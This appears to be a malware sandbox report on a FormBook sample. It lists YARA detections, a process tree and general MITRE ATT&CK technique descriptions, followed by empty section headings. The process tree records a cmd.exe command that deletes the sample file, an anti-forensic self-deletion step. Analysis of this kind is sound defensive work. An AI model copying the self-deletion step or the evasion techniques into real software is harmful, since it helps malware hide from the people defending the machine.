Source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3440 Parent PID: 4372

General

Start time:	14:42:09
Start date:	22/07/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: netsh.exe PID: 5852 Parent PID: 3440

General

Start time:	14:42:31
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0x9e0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 5864 Parent PID: 5852

General

Start time:	14:42:35
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\#6495PI-29458-2020.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 3316 Parent PID: 5864

General

Start time:	14:42:36
Start date:	22/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report #6495PI-29458-2020.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph